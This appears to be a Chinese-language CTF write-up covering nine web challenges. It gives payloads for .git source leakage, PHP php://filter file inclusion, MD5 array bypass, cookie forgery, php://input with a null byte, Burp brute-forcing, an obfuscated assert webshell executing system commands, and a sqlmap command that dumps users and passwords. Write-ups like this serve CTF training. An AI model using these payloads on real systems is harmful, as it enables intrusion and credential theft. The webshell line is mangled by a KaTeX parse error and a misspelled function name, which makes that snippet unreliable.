2月21号CTF记录

第一题 source

这题描述: 我哥说渗透我只用linux环境，flag在源码，抓包都没有发现，查看提示隐藏在.git目录下。

.git文件是开发人员在开发过程中使用 Git (分布式版本控制系统)做开发时产生的隐藏目录，该文件包含一些版本信息和网站源码，数据库信息等敏感信息。

• 使用dirsearch.py脚本扫描发现.git目录
• 使用命令下载wget -r http://114.67.246.176:14508/.git文件
  • （-r是表示递归的意思,就是把这个路径下所有的文件都给下载下来）
• 在所在下载文件目录下命令操作git reflog
• 依次查看修改日志git show 文件名得到flag

第二题 文件包含

根据提示操作发现url上出现?file=show.php，file=XXX.php，优先考虑文件包含
使用PHP伪协议，php://filter可以获取指定文件源码。当它与包含函数结合时，php://filter流会以base64读取文件输出

?file=php://filter/resource=xxx.php
通常获取源代码时，伪协议将xxx.php当文件执行，
使得很多信息往往不能直接显示在浏览器页面上，通常使用base64编码后再显示
构造URL?file=php://filter/read=convert.base64-encode/resource=index.php

得到一串base64加密字符串，解密得到flag

第三题 好像需要密码

提示五位数字密码，直接burp数字爆破，线程调200，爆破得到密码，得到flag

第四题 备份是个好习惯

备份想到.bak，进去得到提示base64解密

<?php
 
include_once "flag.php";   //包含 flag.php 文件
ini_set("display_errors", 0);   //设置不返回错误信息
$str = strstr($_SERVER['REQUEST_URI'], '?');//判断URL里是否有问号，存在就返回给 $str
$str = substr($str,1);   //获取 ？ 后面的值
$str = str_replace('key','',$str);       //将 $str 里面的 key 替换为空
parse_str($str);//解析字符串echo md5($key1);       //将 key1 进行 MD5 加密并输出
echo md5($key2);    //将 key2 进行 MD5 加密并输出
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag"; //如果 key1 和 key2 的值不相等，但是两个的 MD5 相等，就返回 flag
}
?>

构造?kekeyy1[]=1&kekeyy1[]=2&kekeyy2[]=1&kekeyy2[]=2得到flag

第五题 COOKIES

观察url ，发现 a2V5cy50eHQ= 是一个base64编码，解码后是keys.txt
尝试用 filename访问index.php（原url使用base64，这也将index.php进行编码），line参数应该是行数，试一下 line=1，2，3，4…
得到

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){ //重要
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

最后发现判断cookie必须满足margin=margin才能访问keys.php，抓包改cookie得到flag

第六题 never_give_up

burp抓包发现源码

";if(!$_GET['id'])
{
	header('Location: hello.php?id=1');
	exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
	echo 'no no no no no no no';
	return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
	$flag = "flag{***********}"
}
else
{
	print "never never never give up !!!";
}

$a不能有.
$a是路径
$id = 0
$b长度大于5，以4开头

• 抓包
• 构造URL?id=0xss&a=php://input&b=%00120345
• post传参bugku is a nice plateform!
• 得到flag

第七题 SHELL

根据描述：送给大家一个过狗一句话 $poc=“a#s#s#e#r#t”; KaTeX parse error: Expected 'EOF', got '#' at position 16: poc_1=explode("#̲",poc); $po{c}_2=$poc_1[0].$po{c}_1[1].$poc_1[2].$po{c}_1[3].$poc_1[4].$poc_1[5]; $po{c}_2($_GET[‘s’])
得到poc=assert
assert 断言函数
编写程序时，常会做出一定的假设，那断言就是用来捕获假设的异常，我们也可以认为断言是异常的一种特殊形式。
断言一般用于程序执行结构的判断，不可让断言处理业务流程。用的最多的场景就是单元测试，一般的单元测试框架都采用了断言。
根据描述是S=XXX
构造URL ？s=sytem(“ls”)得到flag

第八题 成绩查询

使用sqlmap注入
sqlmap -r http:// --dbs --tables --volumes --dump --passwords --users
得到flag

第九题 秋名山车神

编写脚本提交